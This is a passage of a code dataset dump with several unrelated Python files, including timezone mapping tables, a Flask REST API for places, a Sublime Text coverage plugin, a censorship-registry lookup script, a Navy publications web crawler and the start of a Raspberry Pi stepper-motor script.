'TZ_ASIA_SHANGHAI',\n 43: 'TZ_AMERICA_BOGOTA',\n 44: 'TZ_AMERICA_COSTA_RICA',\n 45: 'TZ_ASIA_NICOSIA',\n 46: 'TZ_EUROPE_PRAGUE',\n 47: 'TZ_EUROPE_BERLIN',\n 48: 'TZ_EUROPE_COPENHAGEN',\n 49: 'TZ_AMERICA_SANTO_DOMINGO',\n 50: 'TZ_PACIFIC_GALAPAGOS',\n 51: 'TZ_AMERICA_GUAYAQUIL',\n 52: 'TZ_EUROPE_TALLINN',\n 53: 'TZ_AFRICA_CAIRO',\n 54: 'TZ_ATLANTIC_CANARY',\n 55: 'TZ_EUROPE_MADRID',\n 56: 'TZ_EUROPE_HELSINKI',\n 57: 'TZ_EUROPE_PARIS',\n 58: 'TZ_EUROPE_LONDON',\n 59: 'TZ_AFRICA_ACCRA',\n 60: 'TZ_EUROPE_ATHENS',\n 61: 'TZ_AMERICA_GUATEMALA',\n 62: 'TZ_ASIA_HONG_KONG',\n 63: 'TZ_AMERICA_TEGUCIGALPA',\n 64: 'TZ_EUROPE_ZAGREB',\n 65: 'TZ_EUROPE_BUDAPEST',\n 66: 'TZ_ASIA_JAKARTA',\n 67: 'TZ_ASIA_MAKASSAR',\n 68: 'TZ_ASIA_JAYAPURA',\n 69: 'TZ_EUROPE_DUBLIN',\n 70: 'TZ_ASIA_JERUSALEM',\n 71: 'TZ_ASIA_KOLKATA',\n 72: 'TZ_ASIA_BAGHDAD',\n 73: 'TZ_ATLANTIC_REYKJAVIK',\n 74: 'TZ_EUROPE_ROME',\n 75: 'TZ_AMERICA_JAMAICA',\n 76: 'TZ_ASIA_AMMAN',\n 77: 'TZ_ASIA_TOKYO',\n 78: 'TZ_AFRICA_NAIROBI',\n 79: 'TZ_ASIA_SEOUL',\n 80: 'TZ_ASIA_KUWAIT',\n 81: 'TZ_ASIA_BEIRUT',\n 82: 'TZ_ASIA_COLOMBO',\n 83: 'TZ_EUROPE_VILNIUS',\n 84: 'TZ_EUROPE_LUXEMBOURG',\n 85: 'TZ_EUROPE_RIGA',\n 86: 'TZ_AFRICA_CASABLANCA',\n 87: 'TZ_EUROPE_SKOPJE',\n 88: 'TZ_EUROPE_MALTA',\n 89: 'TZ_INDIAN_MAURITIUS',\n 90: 'TZ_INDIAN_MALDIVES',\n 91: 'TZ_AMERICA_TIJUANA',\n 92: 'TZ_AMERICA_HERMOSILLO',\n 93: 'TZ_AMERICA_MAZATLAN',\n 94: 'TZ_AMERICA_MEXICO_CITY',\n 95: 'TZ_ASIA_KUALA_LUMPUR',\n 96: 'TZ_AFRICA_LAGOS',\n 97: 'TZ_AMERICA_MANAGUA',\n 98: 'TZ_EUROPE_AMSTERDAM',\n 99: 'TZ_EUROPE_OSLO',\n 100: 'TZ_PACIFIC_AUCKLAND',\n 101: 'TZ_ASIA_MUSCAT',\n 102: 'TZ_AMERICA_PANAMA',\n 103: 'TZ_AMERICA_LIMA',\n 104: 'TZ_ASIA_MANILA',\n 105: 'TZ_ASIA_KARACHI',\n 106: 'TZ_EUROPE_WARSAW',\n 107: 'TZ_AMERICA_PUERTO_RICO',\n 108: 'TZ_ASIA_GAZA',\n 109: 'TZ_ATLANTIC_AZORES',\n 110: 'TZ_EUROPE_LISBON',\n 111: 'TZ_AMERICA_ASUNCION',\n 112: 'TZ_ASIA_QATAR',\n 113: 'TZ_EUROPE_BUCHAREST',\n 114: 'TZ_EUROPE_BELGRADE',\n 115: 'TZ_EUROPE_KALININGRAD',\n 116: 'TZ_EUROPE_MOSCOW',\n 117: 'TZ_EUROPE_SAMARA',\n 118: 'TZ_ASIA_YEKATERINBURG',\n 119: 'TZ_ASIA_OMSK',\n 120: 'TZ_ASIA_KRASNOYARSK',\n 121: 'TZ_ASIA_IRKUTSK',\n 122: 'TZ_ASIA_YAKUTSK',\n 123: 'TZ_ASIA_VLADIVOSTOK',\n 124: 'TZ_ASIA_MAGADAN',\n 125: 'TZ_ASIA_KAMCHATKA',\n 126: 'TZ_ASIA_RIYADH',\n 127: 'TZ_EUROPE_STOCKHOLM',\n 128: 'TZ_ASIA_SINGAPORE',\n 129: 'TZ_EUROPE_LJUBLJANA',\n 130: 'TZ_EUROPE_BRATISLAVA',\n 131: 'TZ_AMERICA_EL_SALVADOR',\n 132: 'TZ_ASIA_BANGKOK',\n 133: 'TZ_AFRICA_TUNIS',\n 134: 'TZ_EUROPE_ISTANBUL',\n 135: 'TZ_AMERICA_PORT_OF_SPAIN',\n 136: 'TZ_ASIA_TAIPEI',\n 137: 'TZ_EUROPE_KIEV',\n 138: 'TZ_AMERICA_MONTEVIDEO',\n 139: 'TZ_AMERICA_CARACAS',\n 140: 'TZ_ASIA_HO_CHI_MINH',\n 141: 'TZ_AFRICA_JOHANNESBURG',\n 142: 'TZ_NUM_TIMEZONES'\n}\n# TZ_AMERICA_LOS_ANGELES -> 1\nfacebookTimezoneCodeToTimezoneId = {v: k for k, v in list(facebookTimezoneIdToTimezoneCode.items())}\n\n# 1 -> TZ_AMERICA_LOS_ANGELES\nfacebookTimezoneIdToTimezoneName = {\n 0: 'Unknown',\n 1: 'America/Los_Angeles',\n 2: 'America/Denver',\n 3: 'Pacific/Honolulu',\n 4: 'America/Anchorage',\n 5: 'America/Phoenix',\n 6: 'America/Chicago',\n 7: 'America/New_York',\n 8: 'Asia/Dubai',\n 9: 'America/Argentina/San_Luis',\n 10: 'America/Argentina/Buenos_Aires',\n 11: 'America/Argentina/Salta',\n 12: 'Europe/Vienna',\n 13: 'Australia/Perth',\n 14: 'Australia/Broken_Hill',\n 15: 'Australia/Sydney',\n 16: 'Europe/Sarajevo',\n 17: 'Asia/Dhaka',\n 18: 'Europe/Brussels',\n 19: 'Europe/Sofia',\n 20: 'Asia/Bahrain',\n 21: 'America/La_Paz',\n 22: 'America/Noronha',\n 23: 'America/Campo_Grande',\n 24: 'America/Belem',\n 25: 'America/Sao_Paulo',\n 26: 'America/Nassau',\n 27: 'America/Dawson',\n 28: 'America/Vancouver',\n 29: 'America/Dawson_Creek',\n 30: 'America/Edmonton',\n 31: 'America/Rainy_River',\n 32: 'America/Regina',\n 33: 'America/Atikokan',\n 34: 'America/Iqaluit',\n 35: 'America/Toronto',\n 36: 'America/Blanc-Sablon',\n 37: 'America/Halifax',\n 38: 'America/St_Johns',\n 39: 'Europe/Zurich',\n 40: 'Pacific/Easter',\n 41: 'America/Santiago',\n 42: 'Asia/Shanghai',\n 43: 'America/Bogota',\n 44: 'America/Costa_Rica',\n 45: 'Asia/Nicosia',\n 46: 'Europe/Prague',\n 47: 'Europe/Berlin',\n 48: 'Europe/Copenhagen',\n 49: 'America/Santo_Domingo',\n 50: 'Pacific/Galapagos',\n 51: 'America/Guayaquil',\n 52: 'Europe/Tallinn',\n 53: 'Africa/Cairo',\n 54: 'Atlantic/Canary',\n 55: 'Europe/Madrid',\n 56: 'Europe/Helsinki',\n 57: 'Europe/Paris',\n 58: 'Europe/London',\n 59: 'Africa/Accra',\n 60: 'Europe/Athens',\n 61: 'America/Guatemala',\n 62: 'Asia/Hong_Kong',\n 63: 'America/Tegucigalpa',\n 64: 'Europe/Zagreb',\n 65: 'Europe/Budapest',\n 66: 'Asia/Jakarta',\n 67: 'Asia/Makassar',\n 68: 'Asia/Jayapura',\n 69: 'Europe/Dublin',\n 70: 'Asia/Jerusalem',\n 71: 'Asia/Kolkata',\n 72: 'Asia/Baghdad',\n 73: 'Atlantic/Reykjavik',\n 74: 'Europe/Rome',\n 75: 'America/Jamaica',\n 76: 'Asia/Amman',\n 77: 'Asia/Tokyo',\n 78: 'Africa/Nairobi',\n 79: 'Asia/Seoul',\n 80: 'Asia/Kuwait',\n 81: 'Asia/Beirut',\n 82: 'Asia/Colombo',\n 83: 'Europe/Vilnius',\n 84: 'Europe/Luxembourg',\n 85: 'Europe/Riga',\n 86: 'Africa/Casablanca',\n 87: 'Europe/Skopje',\n 88: 'Europe/Malta',\n 89: 'Indian/Mauritius',\n 90: 'Indian/Maldives',\n 91: 'America/Tijuana',\n 92: 'America/Hermosillo',\n 93: 'America/Mazatlan',\n 94: 'America/Mexico_City',\n 95: 'Asia/Kuala_Lumpur',\n 96: 'Africa/Lagos',\n 97: 'America/Managua',\n 98: 'Europe/Amsterdam',\n 99: 'Europe/Oslo',\n 100: 'Pacific/Auckland',\n 101: 'Asia/Muscat',\n 102: 'America/Panama',\n 103: 'America/Lima',\n 104: 'Asia/Manila',\n 105: 'Asia/Karachi',\n 106: 'Europe/Warsaw',\n 107: 'America/Puerto_Rico',\n 108: 'Asia/Gaza',\n 109: 'Atlantic/Azores',\n 110: 'Europe/Lisbon',\n 111: 'America/Asuncion',\n 112: 'Asia/Qatar',\n 113: 'Europe/Bucharest',\n 114: 'Europe/Belgrade',\n 115: 'Europe/Kaliningrad',\n 116: 'Europe/Moscow',\n 117: 'Europe/Samara',\n 118: 'Asia/Yekaterinburg',\n 119: 'Asia/Omsk',\n 120: 'Asia/Krasnoyarsk',\n 121: 'Asia/Irkutsk',\n 122: 'Asia/Yakutsk',\n 123: 'Asia/Vladivostok',\n 124: 'Asia/Magadan',\n 125: 'Asia/Kamchatka',\n 126: 'Asia/Riyadh',\n 127: 'Europe/Stockholm',\n 128: 'Asia/Singapore',\n 129: 'Europe/Ljubljana',\n 130: 'Europe/Bratislava',\n 131: 'America/El_Salvador',\n 132: 'Asia/Bangkok',\n 133: 'Africa/Tunis',\n 134: 'Europe/Istanbul',\n 135: 'America/Port_of_Spain',\n 136: 'Asia/Taipei',\n 137: 'Europe/Kiev',\n 138: 'America/Montevideo',\n 139: 'America/Caracas',\n 140: 'Asia/Ho_Chi_Minh',\n 141: 'Africa/Johannesburg',\n 142: 'Num/Timezones'\n}\n# TZ_AMERICA_LOS_ANGELES -> 1\nfacebookTimezoneNameToTimezoneId = {v: k for k, v in list(facebookTimezoneIdToTimezoneName.items())}\n\n# TZ_AMERICA_LOS_ANGELES -> America/Los_Angeles\nfacebookTimezoneCodeToTimezoneName = \\\n {k: facebookTimezoneIdToTimezoneName[v] for (k, v) in list(facebookTimezoneCodeToTimezoneId.items())}\n# America/Los_Angeles -> TZ_AMERICA_LOS_ANGELES\nfacebookTimezoneNameToTimezoneCode = {v: k for k, v in list(facebookTimezoneCodeToTimezoneName.items())}\n\n# 5 -> Etc/GMT+5\ndef timezoneNameFromTimezoneOffset(timezoneOffset):\n '''\n Returns a timezone based on the timezone offset, as returned in the 'timezone' field of:\n https://developers.facebook.com/docs/graph-api/reference/v2.12/user\n\n :param timezoneOffset: Float, -24.0 to 24.0\n :return: timezoneName\n '''\n\n # TODO: Handle 0.25, 0.5 and 0.75 values - these actually exist\n timezoneOffset = round(timezoneOffset)\n\n # unfortunately we need these 2 ifs, because pytz doesn't support +13 adn +14 timezones\n if timezoneOffset == 13:\n return 'Pacific/Auckland'\n elif timezoneOffset == 14:\n return 'Pacific/Kiritimati'\n elif timezoneOffset > 0:\n return 'Etc/GMT+%d' % timezoneOffset\n elif timezoneOffset == 0:\n return 'Etc/GMT'\n else:\n return 'Etc/GMT%d' % timezoneOffset","sub_path":"facebook_timezones/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"397212181","text":"#!/usr/bin/python\n\n# Copyright (c) 2012 Lars Hupfeldt Nielsen, Hupfeldt IT\n# All rights reserved. This work is under a BSD license, see LICENSE.TXT.\n\nfrom ..attribute import Attribute\n\n\ndef test_attribute_repr():\n class Container(object):\n attributes = {}\n ac = Attribute(attribute_name='some_name1')\n assert repr(ac) == \"Attribute: 'some_name1':not-frozen, values: {}\"\n ac._mc_frozen = True\n assert repr(ac) == \"Attribute: 'some_name1':frozen, values: {}\"\n","sub_path":"test/attribute_test.py","file_name":"attribute_test.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"237352542","text":"#!/usr/bin/python3\n\"\"\"Module that handles all default RestFul API actions for places\"\"\"\nfrom api.v1.views import app_views\nfrom flask import jsonify, abort, request, make_response\nfrom models.place import Place\nfrom models.city import City\nfrom models.user import User\nfrom models import storage\n\n\n@app_views.route('/cities//places', methods=['GET'],\n strict_slashes=False)\ndef get_places(city_id):\n \"\"\"Returns a list of all the places\"\"\"\n city = storage.get(\"City\", city_id)\n if city is None:\n abort(404)\n place_list = []\n for place in city.places:\n place_dict = place.to_dict()\n place_list.append(place_dict)\n return jsonify(place_list)\n\n\n@app_views.route('/places/', methods=['GET'],\n strict_slashes=False)\ndef get_place(place_id):\n \"\"\"Returns the place requested\n\n place_id: id of the place to get\"\"\"\n places = list(storage.all(Place).values())\n for place in places:\n if place.id == place_id:\n return jsonify(place.to_dict())\n abort(404)\n\n\n@app_views.route('/places/', methods=['DELETE'],\n strict_slashes=False)\ndef delete_place(place_id):\n \"\"\"Deletes a place\n\n place_id: id of the place to delete\"\"\"\n places = list(storage.all(Place).values())\n place = None\n for item in places:\n if item.id == place_id:\n place = item\n if place is None:\n abort(404)\n storage.delete(place)\n storage.save()\n return jsonify({}), 200\n\n\n@app_views.route('/cities//places', methods=['POST'],\n strict_slashes=False)\ndef create_place(city_id):\n \"\"\"Creates a new place\"\"\"\n city = storage.get(\"City\", city_id)\n if city is None:\n abort(404)\n place_dict = request.get_json(silent=True)\n if place_dict is None:\n return make_response(\"Not a JSON\", 400)\n\n try:\n place_user_id = place_dict['user_id']\n except KeyError:\n return make_response(\"Missing user_id\", 400)\n user = storage.get(\"User\", place_user_id)\n if user is None:\n abort(404)\n\n try:\n place_name = place_dict['name']\n except KeyError:\n return make_response(\"Missing name\", 400)\n\n place = Place(name=place_name, user_id=place_user_id, city_id=city_id)\n storage.new(place)\n storage.save()\n return jsonify(place.to_dict()), 201\n\n\n@app_views.route('/places/', methods=['PUT'],\n strict_slashes=False)\ndef update_place(place_id):\n \"\"\"Updates a place\n\n place_id: id of the place to update\"\"\"\n places = list(storage.all(Place).values())\n place_dict = request.get_json(silent=True)\n if place_dict is None:\n return make_response(\"Not a JSON\", 400)\n for place in places:\n if place.id == place_id:\n for k, v in place_dict.items():\n if k != 'id' and k != 'created_at' and k != 'updated_at'\\\n and k != 'user_id' and k != 'city_id':\n setattr(place, k, v)\n storage.save()\n return jsonify(place.to_dict()), 200\n abort(404)\n","sub_path":"api/v1/views/places.py","file_name":"places.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"60939993","text":"from __future__ import print_function\nimport os\nimport sublime\nimport sublime_plugin\nimport subprocess\nimport sys\nimport time\nimport threading\n\nSETTINGS = None\n\n\ndef plugin_loaded():\n global SETTINGS\n SETTINGS = sublime.load_settings('PyCover.sublime-settings')\n if SETTINGS and SETTINGS.get('python') is not None:\n print('Loaded settings for PyCover')\n else:\n print('Error loading settings for PyCover')\n\nif sys.version_info[0] == 2:\n sublime.set_timeout(plugin_loaded, 0)\n\n\nclass SublimePythonCoverageListener(sublime_plugin.EventListener):\n \"\"\"Event listener to highlight uncovered lines when a Python file loads.\"\"\"\n\n def on_load(self, view):\n if SETTINGS.get('onload', False) and 'source.python' in view.scope_name(0):\n view.run_command('show_python_coverage')\n\n\nclass ShowPythonCoverageCommand(sublime_plugin.TextCommand):\n \"\"\"Highlight uncovered lines in the current file\n based on a previous coverage run.\"\"\"\n\n def is_visible(self):\n return self.is_enabled()\n\n def is_enabled(self):\n return 'source.python' in self.view.scope_name(0)\n\n def run(self, edit):\n fname = self.view.file_name()\n if not self.is_enabled() or not fname:\n return\n\n local_settings = self.view.settings()\n if local_settings.get('showing', False):\n self.view.erase_regions('PyCover')\n local_settings.set('showing', False)\n return # Toggle off\n\n cov_file = find(fname, '.coverage')\n if not cov_file:\n status_report('Could not find .coverage file for %s' % fname, wrap=True)\n return\n cov_config = find(fname, '.coveragerc') or ''\n\n # run missing_lines.py with the correct paths\n python = SETTINGS.get('python', '')\n if not python:\n python = which('python')\n ml_file = os.path.join(sublime.packages_path(), 'PyCover', 'scripts',\n 'missing_lines.py')\n p = subprocess.Popen([python, ml_file, cov_file, cov_config, fname],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n threading.Thread(target=missing_lines_callback, args=(self.view, p)).start()\n\n\ndef missing_lines_callback(view, proc, poll_sleep=0.1, poll_timeout=10):\n progress_status = lambda: sublime.status_message('Finding missing lines...')\n sublime.set_timeout(progress_status, 0)\n # poll for results\n tic = time.time()\n while proc.poll() is None:\n if time.time() - tic > poll_timeout:\n msg = 'missing_lines.py timed out after %f s' % (time.time() - tic)\n status_report(msg, wrap=True)\n proc.kill()\n return\n time.sleep(poll_sleep)\n sublime.set_timeout(progress_status, 0)\n\n stdout, stderr = proc.communicate()\n if proc.returncode != 0:\n status_report(stderr.decode('UTF-8'), wrap=True)\n return\n\n # read stdout to parse missing lines\n missing_lines = map(int, stdout.decode('UTF-8').splitlines())\n\n # update highlighted regions\n sublime.set_timeout(lambda: _update_highlighted(view, missing_lines), 0)\n\n\ndef _update_highlighted(view, missing_lines):\n outlines = [\n view.full_line(view.text_point(line_num-1, 0))\n for line_num in missing_lines]\n view.erase_regions('PyCover')\n\n flags = sublime.HIDDEN\n if SETTINGS.get('highlight_uncovered_lines', False):\n flags = sublime.DRAW_NO_OUTLINE\n\n if outlines:\n view.add_regions('PyCover', outlines, 'invalid',\n 'Packages/PyCover/themes/default/bar.png', flags)\n view.settings().set('showing', True)\n status_report('%d missing lines annotated.' % len(outlines))\n\n\ndef find(base, *rel, **kwargs):\n access = kwargs.get('access', os.R_OK)\n rel = os.path.join(*rel)\n while True:\n path = os.path.join(base, rel)\n if os.access(path, access):\n return path\n baseprev, base = base, os.path.dirname(base)\n if not base or base == baseprev:\n return\n\n\ndef which(progname):\n exts = os.environ.get('PATHEXT', '').split(os.pathsep)\n for path in os.environ['PATH'].split(os.pathsep):\n for ext in exts:\n fullpath = os.path.join(path, progname + ext)\n if os.path.exists(fullpath):\n return fullpath\n return None\n\n\ndef status_report(message, wrap=False):\n print('PyCover:', message)\n if wrap:\n sublime.set_timeout(lambda: sublime.status_message(message), 0)\n else:\n sublime.status_message(message)\n","sub_path":"PyCover.py","file_name":"PyCover.py","file_ext":"py","file_size_in_byte":4257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"494068659","text":"import pandas as pd\nimport numpy as np\nimport requests\n\n\n\ndef pagnition():\n df=pd.read_csv(\"pagnition/input/johnlewis_com.csv\",usecols=['Category URL\",\"Category Name\",\"First Page\",\"Last Page\",\"Source Domain\",\"Product Count'])\n\n tmpList=['url']\n for url in df['Category URL\",\"Category Name\",\"First Page\",\"Last Page\",\"Source Domain\",\"Product Count']:\n urltmp=''\n numbertmp=0\n if \"\\\",\\\"\" in str(url):\n urltmp = url.split(\"\\\",\\\"\")[0]\n\n numbertmp=url.split(\"\\\",\\\"\")[-1]\n\n perpageCount=30\n pageNum=int(int(numbertmp)/perpageCount)+1\n for i in range(pageNum):\n # if urltmp !='':\n tmpurl = urltmp+'?page='+str((i+1))\n # else:\n # tmpurl = url +'?Nao='+str(21*(i+1))+'&Ns=None&storeSelection=2408,2414,2409,2407,2404'\n print(tmpurl)\n tmpList.append(tmpurl)\n savedf=pd.Series(tmpList)\n savedf.to_csv(\"pagnition/output/johnlewis_com.csv\",index=False)\n\npagnition()","sub_path":"pagnition/supplier/www.smythestoys.com/pagination.py","file_name":"pagination.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"545625199","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nimport shutil\nimport urllib.request\nimport zipfile\nimport json\nimport socket\n\nimport netaddr\n\n\narg_parser = argparse.ArgumentParser(description=\"Roskomnadzor ban registry checker\")\n\narg_parser.add_argument(\"mode\", type=str, choices=(\"fetch\", \"check\"), help=\"run mode\")\narg_parser.add_argument(\"host\", type=str, nargs=\"*\",\n help=\"ip address, network or fqdn to check\")\narg_parser.add_argument(\"--registry-url\", type=str,\n default=\"https://github.com/zapret-info/z-i/archive/master.zip\",\n help=\"Registry repository url\")\n\nscript_args = arg_parser.parse_args()\n\nif script_args.mode == \"check\" and not script_args.host:\n arg_parser.error(\"the host argument is required for check mode\")\n\n\nscript_dir = os.path.dirname(__file__)\nregistry_dir = os.path.join(script_dir, \"registry\")\nregistry_archive = os.path.join(script_dir, \"registry.zip\")\nips_data_file = os.path.join(registry_dir, \"z-i-master\", \"dump.csv\")\nfqdn_data_file = os.path.join(registry_dir, \"z-i-master\", \"nxdomain.txt\")\n\n\ndef fetch():\n if os.path.exists(registry_dir):\n shutil.rmtree(registry_dir)\n\n os.mkdir(registry_dir)\n\n urllib.request.urlretrieve(script_args.registry_url, registry_archive)\n\n zip_f = zipfile.ZipFile(registry_archive, 'r')\n zip_f.extractall(registry_dir)\n zip_f.close()\n\n\n\ndef check(hosts):\n result = {}\n\n ips_data = open(ips_data_file, encoding=\"cp1251\").readlines()[1:]\n fqdn_data = open(fqdn_data_file).readlines()\n\n for host in hosts:\n try:\n host_obj = netaddr.IPNetwork(host)\n except netaddr.core.AddrFormatError:\n host_obj = host\n\n ip_objs = []\n\n if type(host_obj) is str:\n try:\n host_ips = socket.gethostbyname_ex(host_obj)[2]\n\n for host_ip in host_ips:\n ip_objs.append(netaddr.IPNetwork(host_ip))\n except (ValueError, socket.gaierror):\n host_ip = None\n\n for line in fqdn_data:\n fqdn_reg = line.strip()\n\n if fqdn_reg == host_obj:\n result[host] = result.get(host, [])\n result[host].append(fqdn_reg)\n else:\n ip_objs = [host_obj]\n\n for ip_obj in ip_objs:\n for line in ips_data:\n subnets = line.strip().split(\";\")[0].split(\"|\")\n\n for subnet in subnets:\n subnet_reg = subnet.strip()\n\n try:\n subnet_obj = netaddr.IPNetwork(subnet_reg)\n except netaddr.core.AddrFormatError:\n continue\n\n if ip_obj in subnet_obj:\n result[host] = result.get(host, [])\n result[host].append(subnet_reg)\n\n if result:\n print(json.dumps(result))\n\n\nif script_args.mode == \"fetch\":\n fetch()\nelif script_args.mode == \"check\":\n check(script_args.host)\n","sub_path":"check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"458559986","text":"import bs4\nimport re\nimport os\nimport requests\nfrom typing import Iterable\nfrom time import sleep\n\nfrom dataPipelines.gc_crawler.requestors import MapBasedPseudoRequestor\nfrom dataPipelines.gc_crawler.exec_model import Crawler, Parser, Pager\nfrom dataPipelines.gc_crawler.data_model import Document, DownloadableItem\nfrom dataPipelines.gc_crawler.utils import close_driver_windows_and_quit\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait # for implicit and explict waits\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import TimeoutException, WebDriverException\nfrom selenium.webdriver.common.action_chains import ActionChains\n\nfrom . import SOURCE_SAMPLE_DIR, BASE_SOURCE_URL, driver\n\n\nclass SECNAVPager(Pager):\n \"\"\"Pager for SECNAV crawler\"\"\"\n\n def iter_page_links(self) -> Iterable[str]:\n \"\"\"Iterator for page links\"\"\"\n base_url = 'https://www.secnav.navy.mil'\n doni_url = 'https://www.secnav.navy.mil/doni/default.aspx'\n\n r = requests.get(doni_url)\n soup = bs4.BeautifulSoup(r.content, features=\"html.parser\")\n\n # get target column of list items\n issuance_list = soup.find_all('a', attrs={'class': 'dynamic'})[:2]\n\n # extract links\n for link in issuance_list[:2]:\n if not link['href'].startswith('http'):\n url = base_url + link['href']\n else:\n url = link['href']\n\n yield url\n\n\nclass SECNAVParser(Parser):\n \"\"\"Parser for SECNAV crawler\"\"\"\n\n def parse_docs_from_page(self, page_url: str, page_text: str) -> Iterable[Document]:\n \"\"\"Parse document objects from page of text\"\"\"\n\n parsed_docs = []\n # parse html response\n base_url = 'https://www.secnav.navy.mil'\n\n\n type_suffix = \"\"\n if page_url.__contains__(\"instruction\"):\n type_suffix = \"INST\"\n if page_url.__contains__(\"notice\"):\n type_suffix = \"NOTE\"\n\n last_page = \"\"\n try:\n driver.get(page_url)\n WebDriverWait(driver, 20).until(ec.presence_of_element_located((By.XPATH, \"//*[@class='dynamic']\")))\n except TimeoutException as e:\n print(\"Error: \" + e)\n print(\"Trying again...\")\n try:\n driver.get(page_url)\n WebDriverWait(driver, 20).until(ec.presence_of_element_located((By.XPATH, \"//*[@class='dynamic']\")))\n except TimeoutException as e:\n print(\"Error: \" + e)\n print(page_url + \"cannot be scrapped.\")\n return parsed_docs\n while True:\n while last_page == driver.current_url:\n sleep(1)\n html = driver.execute_script(\"return document.documentElement.outerHTML\")\n soup = bs4.BeautifulSoup(html, features=\"html.parser\")\n last_page = driver.current_url\n\n table = soup.find('table', attrs={'class': 'ms-listviewtable'})\n rows = table.find_all('tr')\n for r in rows[1:]:\n td = r.find_all('td')\n doc_name = td[0].text + type_suffix + \" \" + td[1].text\n doc_title = td[2].text\n doc_num = td[1].text\n doc_type = td[0].text + type_suffix\n publication_date = td[3].text\n pdf_url = base_url + td[1].find('a')['href'].replace(\" \", '%20')\n pdf_di = DownloadableItem(\n doc_type='pdf',\n web_url=pdf_url\n )\n source_page_url = driver.current_url\n cac_login_required = re.match('^[A-Za-z]', doc_num) != None\n version_hash_fields = {\n \"active_status\": td[4].text,\n \"sponsor\": td[5].text,\n \"form\": td[6].text,\n \"reports_control_symbol\": td[7].text,\n \"pages\": td[8].text,\n \"cancelled_date\": td[9].text\n }\n doc = Document(\n doc_name=doc_name.strip(),\n doc_title=doc_title.strip(),\n doc_num=doc_num.strip(),\n doc_type=doc_type.strip(),\n publication_date=publication_date,\n cac_login_required=cac_login_required,\n crawler_used=\"secnav_pubs\",\n source_page_url=source_page_url,\n version_hash_raw_data=version_hash_fields,\n downloadable_items=[pdf_di]\n )\n parsed_docs.append(doc)\n\n if (soup.find('td', attrs={'id': 'pagingWPQ3next'}) != None):\n try:\n next_button = WebDriverWait(driver, 20).until(\n ec.presence_of_element_located((By.XPATH, \"//*[@id='pagingWPQ3next']\")))\n ActionChains(driver).move_to_element(next_button).perform()\n next_button.click()\n except WebDriverException as e:\n print(\"Error: \" + e)\n print(\"Cannot go to the next page.\")\n break\n else:\n break\n\n return parsed_docs\n\n\nclass SECNAVCrawler(Crawler):\n \"\"\"Crawler for the example web scraper\"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(\n *args,\n **kwargs,\n pager=SECNAVPager(\n starting_url=BASE_SOURCE_URL\n ),\n parser=SECNAVParser()\n )\n\n\nclass FakeSECNAVCrawler(Crawler):\n \"\"\"SECNAV crawler that just uses stubs and local source files\"\"\"\n def __init__(self, *args, **kwargs):\n with open(os.path.join(SOURCE_SAMPLE_DIR, 'secnav_pubs.html')) as f:\n default_text = f.read()\n\n super().__init__(\n *args,\n **kwargs,\n pager=SECNAVPager(\n requestor=MapBasedPseudoRequestor(\n default_text=default_text\n ),\n starting_url=BASE_SOURCE_URL\n ),\n parser=SECNAVParser()\n )\n","sub_path":"dataPipelines/gc_crawler/secnav_pubs/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"618874630","text":"#!/usr/bin/env python\n\n# Based on: https://www.raspberrypi.org/forums/viewtopic.php?t=242928\\.\n#\n# Software to drive 4 wire stepper motor using a TB6600 Driver\n# PRi - RPi 3B\n#\n# Route 3.3 VDC to the controller \"+\" input for each: ENA, PUL, and DIR\n#\n# Connect GPIO pins as shown below) to the \"-\" input for each: ENA, PUL, and DIR\n#\n#\nimport time\nimport atexit\nimport threading\nimport random\nimport board\nimport sys, tty, termios, time\nfrom time import sleep\nimport RPi.GPIO as GPIO\n#\nPUL = 17 # Stepper Drive Pulses\nDIR = 27 # Controller Direction Bit (High for Controller default / LOW to Force a Direction Change).\nENA = 22 # Controller Enable Bit (High to Enable / LOW to Disable).\n# DIRI = 14 # Status Indicator LED - Direction\n# ENAI = 15 # Status indicator LED - Controller Enable\n#\n# NOTE: Leave DIR and ENA disconnected, and the controller WILL drive the motor in Default direction if PUL is applied.\n# \nGPIO.setmode(GPIO.BCM)\n# GPIO.setmode(GPIO.BOARD) # Do NOT use GPIO.BOARD mode. Here for comparison only. \n#\nGPIO.setup(PUL, GPIO.OUT)\nGPIO.setup(DIR, GPIO.OUT)\nGPIO.setup(ENA, GPIO.OUT)\n# GPIO.setup(DIRI, GPIO.OUT)\n# GPIO.setup(ENAI, GPIO.OUT)\n#\n\ndef getch():\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(sys.stdin.fileno())\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\nprint('PUL = GPIO 17 - RPi 3B-Pin #11')\nprint('DIR = GPIO 27 - RPi 3B-Pin #13')\nprint('ENA = GPIO 22 - RPi 3B-Pin #15')\n# print('ENAI = GPIO 14 - RPi 3B-Pin #8')\n# print('DIRI = GPIO 15 - RPi 3B-Pin #10')\n\n#\nprint('Initialization Completed')\n#\n# Could have usesd only one DURATION constant but chose two. This gives play options.\ndurationFwd = 5000 # This is the duration of the motor spinning. used for forward direction\ndurationBwd = 5000 # This is the duration of the motor spinning. used for reverse direction\nprint('Duration Fwd set to ' + str(durationFwd))\nprint('Duration Bwd set to ' + str(durationBwd))\n#\ndelay = 0.0000001 # This is 